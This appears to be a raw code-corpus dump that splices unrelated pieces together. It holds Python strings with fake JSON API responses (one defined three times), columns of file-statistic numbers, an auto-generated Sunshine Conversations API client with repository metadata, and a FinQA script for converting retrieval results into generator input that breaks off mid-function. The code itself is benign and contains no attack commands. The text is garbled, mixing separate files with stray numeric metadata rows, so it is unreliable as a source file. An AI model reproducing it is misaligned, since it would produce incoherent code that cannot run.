fake_response_TableReturn_json = """{"document": {"html": "fake_html", "title": "fake_title", "hash": "fake_hash"}, "model_id": "fake_model_id", "model_version": "fake_model_version", "tables": []}"""
fake_response_CompareReturn_json = """{"model_id": "fake_model_id", "model_version": "fake_model_version", "documents": [], "aligned_elements": [], "unaligned_elements": []}"""
fake_response_FeedbackReturn_json = """{"feedback_id": "fake_feedback_id", "user_id": "fake_user_id", "comment": "fake_comment", "created": "2017-05-16T13:56:54.957Z", "feedback_data": {"feedback_type": "fake_feedback_type", "document": {"title": "fake_title", "hash": "fake_hash"}, "model_id": "fake_model_id", "model_version": "fake_model_version", "location": {"begin": 5, "end": 3}, "text": "fake_text", "original_labels": {"types": [], "categories": [], "modification": "fake_modification"}, "updated_labels": {"types": [], "categories": [], "modification": "fake_modification"}, "pagination": {"refresh_cursor": "fake_refresh_cursor", "next_cursor": "fake_next_cursor", "refresh_url": "fake_refresh_url", "next_url": "fake_next_url", "total": 5}}}"""
fake_response_FeedbackList_json = """{"feedback": []}"""
fake_response_GetFeedback_json = """{"feedback_id": "fake_feedback_id", "created": "2017-05-16T13:56:54.957Z", "comment": "fake_comment", "feedback_data": {"feedback_type": "fake_feedback_type", "document": {"title": "fake_title", "hash": "fake_hash"}, "model_id": "fake_model_id", "model_version": "fake_model_version", "location": {"begin": 5, "end": 3}, "text": "fake_text", "original_labels": {"types": [], "categories": [], "modification": "fake_modification"}, "updated_labels": {"types": [], "categories": [], "modification": "fake_modification"}, "pagination": {"refresh_cursor": "fake_refresh_cursor", "next_cursor": "fake_next_cursor", "refresh_url": "fake_refresh_url", "next_url": "fake_next_url", "total": 5}}}"""
fake_response_FeedbackDeleted_json = """{"status": 6, "message": "fake_message"}"""
fake_response_BatchStatus_json = """{"function": "fake_function", "input_bucket_location": "fake_input_bucket_location", "input_bucket_name": "fake_input_bucket_name", "output_bucket_location": "fake_output_bucket_location", "output_bucket_name": "fake_output_bucket_name", "batch_id": "fake_batch_id", "document_counts": {"total": 5, "pending": 7, "successful": 10, "failed": 6}, "status": "fake_status", "created": "2017-05-16T13:56:54.957Z", "updated": "2017-05-16T13:56:54.957Z"}"""
fake_response_Batches_json = """{"batches": []}"""
fake_response_BatchStatus_json = """{"function": "fake_function", "input_bucket_location": "fake_input_bucket_location", "input_bucket_name": "fake_input_bucket_name", "output_bucket_location": "fake_output_bucket_location", "output_bucket_name": "fake_output_bucket_name", "batch_id": "fake_batch_id", "document_counts": {"total": 5, "pending": 7, "successful": 10, "failed": 6}, "status": "fake_status", "created": "2017-05-16T13:56:54.957Z", "updated": "2017-05-16T13:56:54.957Z"}"""
fake_response_BatchStatus_json = """{"function": "fake_function", "input_bucket_location": "fake_input_bucket_location", "input_bucket_name": "fake_input_bucket_name", "output_bucket_location": "fake_output_bucket_location", "output_bucket_name": "fake_output_bucket_name", "batch_id": "fake_batch_id", "document_counts": {"total": 5, "pending": 7, "successful": 10, "failed": 6}, "status": "fake_status", "created": "2017-05-16T13:56:54.957Z", "updated": "2017-05-16T13:56:54.957Z"}"""
| 38.331193
| 756
| 0.508293
| 3,752
| 41,781
| 5.414446
| 0.079158
| 0.033079
| 0.021265
| 0.035442
| 0.847207
| 0.838297
| 0.830322
| 0.820231
| 0.814226
| 0.800148
| 0
| 0.015074
| 0.209306
| 41,781
| 1,089
| 757
| 38.366391
| 0.599861
| 0.253225
| 0
| 0.748851
| 0
| 0.013783
| 0.194857
| 0.046665
| 0
| 0
| 0
| 0
| 0.061256
| 1
| 0.153139
| false
| 0
| 0.013783
| 0
| 0.258806
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f023ac1df51cf1ef5826d1574447a0855e92b54b
| 32,745
|
py
|
Python
|
sunshine_conversations_client/api/conversations_api.py
|
Dima2022/sunshine-conversations-python
|
8085a82dc320d97f09bb0174d11dd1865a65404a
|
[
"Apache-2.0"
] | 4
|
2020-09-27T14:28:25.000Z
|
2022-02-02T13:51:29.000Z
|
sunshine_conversations_client/api/conversations_api.py
|
Dima2022/sunshine-conversations-python
|
8085a82dc320d97f09bb0174d11dd1865a65404a
|
[
"Apache-2.0"
] | 3
|
2021-09-30T18:18:58.000Z
|
2021-12-04T07:55:23.000Z
|
sunshine_conversations_client/api/conversations_api.py
|
Dima2022/sunshine-conversations-python
|
8085a82dc320d97f09bb0174d11dd1865a65404a
|
[
"Apache-2.0"
] | 5
|
2020-11-07T02:08:18.000Z
|
2021-12-07T17:10:23.000Z
|
# coding: utf-8
"""
Sunshine Conversations API
The version of the OpenAPI document: 9.4.5
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from sunshine_conversations_client.api_client import ApiClient
from sunshine_conversations_client.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class ConversationsApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_conversation(self, app_id, conversation_create_body, **kwargs): # noqa: E501
"""Create Conversation # noqa: E501
Create a conversation for the specified user(s). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_conversation(app_id, conversation_create_body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str app_id: Identifies the app. (required)
:param ConversationCreateBody conversation_create_body: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: ConversationResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.create_conversation_with_http_info(app_id, conversation_create_body, **kwargs) # noqa: E501
def create_conversation_with_http_info(self, app_id, conversation_create_body, **kwargs): # noqa: E501
"""Create Conversation # noqa: E501
Create a conversation for the specified user(s). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_conversation_with_http_info(app_id, conversation_create_body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str app_id: Identifies the app. (required)
:param ConversationCreateBody conversation_create_body: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(ConversationResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'app_id',
'conversation_create_body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_conversation" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'app_id' is set
if self.api_client.client_side_validation and ('app_id' not in local_var_params or # noqa: E501
local_var_params['app_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `app_id` when calling `create_conversation`") # noqa: E501
# verify the required parameter 'conversation_create_body' is set
if self.api_client.client_side_validation and ('conversation_create_body' not in local_var_params or # noqa: E501
local_var_params['conversation_create_body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `conversation_create_body` when calling `create_conversation`") # noqa: E501
collection_formats = {}
path_params = {}
if 'app_id' in local_var_params:
path_params['appId'] = local_var_params['app_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'conversation_create_body' in local_var_params:
body_params = local_var_params['conversation_create_body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth', 'bearerAuth'] # noqa: E501
return self.api_client.call_api(
'/v2/apps/{appId}/conversations', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ConversationResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_conversation(self, app_id, conversation_id, **kwargs): # noqa: E501
"""Delete Conversation # noqa: E501
Delete an entire conversation record, along with its messages and attachments. Note that the default conversation cannot be deleted, but the messages contained [can be](#deleteAllMessages). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_conversation(app_id, conversation_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str app_id: Identifies the app. (required)
:param str conversation_id: Identifies the conversation. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_conversation_with_http_info(app_id, conversation_id, **kwargs) # noqa: E501
def delete_conversation_with_http_info(self, app_id, conversation_id, **kwargs): # noqa: E501
"""Delete Conversation # noqa: E501
Delete an entire conversation record, along with its messages and attachments. Note that the default conversation cannot be deleted, but the messages contained [can be](#deleteAllMessages). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_conversation_with_http_info(app_id, conversation_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str app_id: Identifies the app. (required)
:param str conversation_id: Identifies the conversation. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(object, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'app_id',
'conversation_id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_conversation" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'app_id' is set
if self.api_client.client_side_validation and ('app_id' not in local_var_params or # noqa: E501
local_var_params['app_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `app_id` when calling `delete_conversation`") # noqa: E501
# verify the required parameter 'conversation_id' is set
if self.api_client.client_side_validation and ('conversation_id' not in local_var_params or # noqa: E501
local_var_params['conversation_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `conversation_id` when calling `delete_conversation`") # noqa: E501
collection_formats = {}
path_params = {}
if 'app_id' in local_var_params:
path_params['appId'] = local_var_params['app_id'] # noqa: E501
if 'conversation_id' in local_var_params:
path_params['conversationId'] = local_var_params['conversation_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth', 'bearerAuth'] # noqa: E501
return self.api_client.call_api(
'/v2/apps/{appId}/conversations/{conversationId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_conversation(self, app_id, conversation_id, **kwargs): # noqa: E501
"""Get Conversation # noqa: E501
Fetches an individual conversation. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_conversation(app_id, conversation_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str app_id: Identifies the app. (required)
:param str conversation_id: Identifies the conversation. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: ConversationResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_conversation_with_http_info(app_id, conversation_id, **kwargs) # noqa: E501
def get_conversation_with_http_info(self, app_id, conversation_id, **kwargs): # noqa: E501
"""Get Conversation # noqa: E501
Fetches an individual conversation. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_conversation_with_http_info(app_id, conversation_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str app_id: Identifies the app. (required)
:param str conversation_id: Identifies the conversation. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(ConversationResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'app_id',
'conversation_id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_conversation" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'app_id' is set
if self.api_client.client_side_validation and ('app_id' not in local_var_params or # noqa: E501
local_var_params['app_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `app_id` when calling `get_conversation`") # noqa: E501
# verify the required parameter 'conversation_id' is set
if self.api_client.client_side_validation and ('conversation_id' not in local_var_params or # noqa: E501
local_var_params['conversation_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `conversation_id` when calling `get_conversation`") # noqa: E501
collection_formats = {}
path_params = {}
if 'app_id' in local_var_params:
path_params['appId'] = local_var_params['app_id'] # noqa: E501
if 'conversation_id' in local_var_params:
path_params['conversationId'] = local_var_params['conversation_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth', 'bearerAuth'] # noqa: E501
return self.api_client.call_api(
'/v2/apps/{appId}/conversations/{conversationId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ConversationResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def list_conversations(self, app_id, filter, **kwargs): # noqa: E501
"""List Conversations # noqa: E501
Lists all conversations that a user is part of. This API is paginated through [cursor pagination](#section/Introduction/API-pagination-and-records-limits). ```shell /v2/apps/:appId/conversations?filter[userId]=42589ad070d43be9b00ff7e5 ``` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_conversations(app_id, filter, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str app_id: Identifies the app. (required)
:param ConversationListFilter filter: Contains parameters for filtering the results. (required)
:param Page page: Contains parameters for applying cursor pagination.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: ConversationListResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_conversations_with_http_info(app_id, filter, **kwargs) # noqa: E501
def list_conversations_with_http_info(self, app_id, filter, **kwargs): # noqa: E501
"""List Conversations # noqa: E501
Lists all conversations that a user is part of. This API is paginated through [cursor pagination](#section/Introduction/API-pagination-and-records-limits). ```shell /v2/apps/:appId/conversations?filter[userId]=42589ad070d43be9b00ff7e5 ``` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_conversations_with_http_info(app_id, filter, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str app_id: Identifies the app. (required)
:param ConversationListFilter filter: Contains parameters for filtering the results. (required)
:param Page page: Contains parameters for applying cursor pagination.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(ConversationListResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'app_id',
'filter',
'page'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_conversations" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'app_id' is set
if self.api_client.client_side_validation and ('app_id' not in local_var_params or # noqa: E501
local_var_params['app_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `app_id` when calling `list_conversations`") # noqa: E501
# verify the required parameter 'filter' is set
if self.api_client.client_side_validation and ('filter' not in local_var_params or # noqa: E501
local_var_params['filter'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `filter` when calling `list_conversations`") # noqa: E501
collection_formats = {}
path_params = {}
if 'app_id' in local_var_params:
path_params['appId'] = local_var_params['app_id'] # noqa: E501
query_params = []
if 'page' in local_var_params and local_var_params['page'] is not None: # noqa: E501
query_params.append(('page', local_var_params['page'])) # noqa: E501
if 'filter' in local_var_params and local_var_params['filter'] is not None: # noqa: E501
query_params.append(('filter', local_var_params['filter'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth', 'bearerAuth'] # noqa: E501
return self.api_client.call_api(
'/v2/apps/{appId}/conversations', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ConversationListResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def update_conversation(self, app_id, conversation_id, conversation_update_body, **kwargs): # noqa: E501
"""Update Conversation # noqa: E501
Updates a conversation record. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_conversation(app_id, conversation_id, conversation_update_body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str app_id: Identifies the app. (required)
:param str conversation_id: Identifies the conversation. (required)
:param ConversationUpdateBody conversation_update_body: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: ConversationResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.update_conversation_with_http_info(app_id, conversation_id, conversation_update_body, **kwargs) # noqa: E501
def update_conversation_with_http_info(self, app_id, conversation_id, conversation_update_body, **kwargs): # noqa: E501
"""Update Conversation # noqa: E501
Updates a conversation record. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_conversation_with_http_info(app_id, conversation_id, conversation_update_body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str app_id: Identifies the app. (required)
:param str conversation_id: Identifies the conversation. (required)
:param ConversationUpdateBody conversation_update_body: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(ConversationResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'app_id',
'conversation_id',
'conversation_update_body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method update_conversation" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'app_id' is set
if self.api_client.client_side_validation and ('app_id' not in local_var_params or # noqa: E501
local_var_params['app_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `app_id` when calling `update_conversation`") # noqa: E501
# verify the required parameter 'conversation_id' is set
if self.api_client.client_side_validation and ('conversation_id' not in local_var_params or # noqa: E501
local_var_params['conversation_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `conversation_id` when calling `update_conversation`") # noqa: E501
# verify the required parameter 'conversation_update_body' is set
if self.api_client.client_side_validation and ('conversation_update_body' not in local_var_params or # noqa: E501
local_var_params['conversation_update_body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `conversation_update_body` when calling `update_conversation`") # noqa: E501
collection_formats = {}
path_params = {}
if 'app_id' in local_var_params:
path_params['appId'] = local_var_params['app_id'] # noqa: E501
if 'conversation_id' in local_var_params:
path_params['conversationId'] = local_var_params['conversation_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'conversation_update_body' in local_var_params:
body_params = local_var_params['conversation_update_body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth', 'bearerAuth'] # noqa: E501
return self.api_client.call_api(
'/v2/apps/{appId}/conversations/{conversationId}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ConversationResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
| 48.655275
| 261
| 0.611299
| 3,587
| 32,745
| 5.327014
| 0.062448
| 0.043542
| 0.064476
| 0.02355
| 0.955097
| 0.951225
| 0.940077
| 0.938193
| 0.923435
| 0.920452
| 0
| 0.01655
| 0.315407
| 32,745
| 672
| 262
| 48.727679
| 0.835839
| 0.442938
| 0
| 0.708589
| 1
| 0
| 0.202853
| 0.060606
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033742
| false
| 0
| 0.015337
| 0
| 0.082822
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b2dbb40059f787d12da45bfd9ae2a50f20793b6b
| 10,000
|
py
|
Python
|
code/generator/Convert.py
|
humblef00ls/FinQA-new
|
ddef84d4dc397f5e14cb1623bc86dac133a8821c
|
[
"MIT"
] | null | null | null |
code/generator/Convert.py
|
humblef00ls/FinQA-new
|
ddef84d4dc397f5e14cb1623bc86dac133a8821c
|
[
"MIT"
] | null | null | null |
code/generator/Convert.py
|
humblef00ls/FinQA-new
|
ddef84d4dc397f5e14cb1623bc86dac133a8821c
|
[
"MIT"
] | null | null | null |
import argparse
import collections
import json
import os
import sys
import random
'''
convert retriever results to generator test input
'''
def remove_space(text_in):
res = []
for tmp in text_in.split(" "):
if tmp != "":
res.append(tmp)
return " ".join(res)
def table_row_to_text(header, row):
'''
use templates to convert table row to text
'''
res = ""
if header[0]:
res += (header[0] + " ")
for head, cell in zip(header[1:], row[1:]):
res += ("The " + row[0] + " of " + head + " is " + cell + " ; ")
res = remove_space(res)
return res.strip()
# for single sent retrieve
def convert_test(json_in, json_out, topn, max_len):
with open(json_in) as f_in:
data = json.load(f_in)
for each_data in data:
table_retrieved = each_data["table_retrieved"]
text_retrieved = each_data["text_retrieved"]
pre_text = each_data["pre_text"]
post_text = each_data["post_text"]
all_text = pre_text + post_text
table = each_data["table"]
all_retrieved = each_data["table_retrieved"] + \
each_data["text_retrieved"]
sorted_dict = sorted(
all_retrieved, key=lambda kv: kv["score"], reverse=True)
acc_len = 0
all_text_in = {}
all_table_in = {}
for tmp in sorted_dict:
if len(all_table_in) + len(all_text_in) >= topn:
break
this_sent_ind = int(tmp["ind"].split("_")[1])
if "table" in tmp["ind"]:
this_sent = table_row_to_text(table[0], table[this_sent_ind])
else:
this_sent = all_text[this_sent_ind]
if acc_len + len(this_sent.split(" ")) < max_len:
if "table" in tmp["ind"]:
all_table_in[tmp["ind"]] = this_sent
else:
all_text_in[tmp["ind"]] = this_sent
acc_len += len(this_sent.split(" "))
else:
break
this_model_input = []
# sorted_dict = sorted(all_table_in.items(), key=lambda kv: int(kv[0].split("_")[1]))
# this_model_input.extend(sorted_dict)
# sorted_dict = sorted(all_text_in.items(), key=lambda kv: int(kv[0].split("_")[1]))
# this_model_input.extend(sorted_dict)
# original_order
sorted_dict_table = sorted(
all_table_in.items(), key=lambda kv: int(kv[0].split("_")[1]))
sorted_dict_text = sorted(
all_text_in.items(), key=lambda kv: int(kv[0].split("_")[1]))
for tmp in sorted_dict_text:
if int(tmp[0].split("_")[1]) < len(pre_text):
this_model_input.append(tmp)
for tmp in sorted_dict_table:
this_model_input.append(tmp)
for tmp in sorted_dict_text:
if int(tmp[0].split("_")[1]) >= len(pre_text):
this_model_input.append(tmp)
each_data["qa"]["model_input"] = this_model_input
with open(json_out, "w") as f:
json.dump(data, f, indent=4)
print(len(data))
def convert_train(json_in, json_out, topn, max_len):
with open(json_in) as f_in:
data = json.load(f_in)
for each_data in data:
table_retrieved = each_data["table_retrieved"]
text_retrieved = each_data["text_retrieved"]
pre_text = each_data["pre_text"]
post_text = each_data["post_text"]
all_text = pre_text + post_text
gold_inds = each_data["qa"]["gold_inds"]
table = each_data["table"]
all_retrieved = each_data["table_retrieved"] + \
each_data["text_retrieved"]
false_retrieved = []
for tmp in all_retrieved:
if tmp["ind"] not in gold_inds:
false_retrieved.append(tmp)
sorted_dict = sorted(
false_retrieved, key=lambda kv: kv["score"], reverse=True)
acc_len = 0
all_text_in = {}
all_table_in = {}
for tmp in gold_inds:
if "table" in tmp:
all_table_in[tmp] = gold_inds[tmp]
else:
all_text_in[tmp] = gold_inds[tmp]
context = ""
for tmp in gold_inds:
context += gold_inds[tmp]
acc_len = len(context.split(" "))
for tmp in sorted_dict:
if len(all_table_in) + len(all_text_in) >= topn:
break
this_sent_ind = int(tmp["ind"].split("_")[1])
if "table" in tmp["ind"]:
this_sent = table_row_to_text(table[0], table[this_sent_ind])
else:
this_sent = all_text[this_sent_ind]
if acc_len + len(this_sent.split(" ")) < max_len:
if "table" in tmp["ind"]:
all_table_in[tmp["ind"]] = this_sent
else:
all_text_in[tmp["ind"]] = this_sent
acc_len += len(this_sent.split(" "))
else:
break
this_model_input = []
# sorted_dict = sorted(all_table_in.items(), key=lambda kv: int(kv[0].split("_")[1]))
# this_model_input.extend(sorted_dict)
# sorted_dict = sorted(all_text_in.items(), key=lambda kv: int(kv[0].split("_")[1]))
# this_model_input.extend(sorted_dict)
# original_order
sorted_dict_table = sorted(
all_table_in.items(), key=lambda kv: int(kv[0].split("_")[1]))
sorted_dict_text = sorted(
all_text_in.items(), key=lambda kv: int(kv[0].split("_")[1]))
for tmp in sorted_dict_text:
if int(tmp[0].split("_")[1]) < len(pre_text):
this_model_input.append(tmp)
for tmp in sorted_dict_table:
this_model_input.append(tmp)
for tmp in sorted_dict_text:
if int(tmp[0].split("_")[1]) >= len(pre_text):
this_model_input.append(tmp)
each_data["qa"]["model_input"] = this_model_input
with open(json_out, "w") as f:
json.dump(data, f, indent=4)
def convert_test_infer(json_in, json_out, topn, mode):
with open(json_in) as f_in:
data = json.load(f_in)
for each_data in data:
table_retrieved = each_data["table_retrieved_all"]
text_retrieved = each_data["text_retrieved_all"]
pre_text = each_data["pre_text"]
post_text = each_data["post_text"]
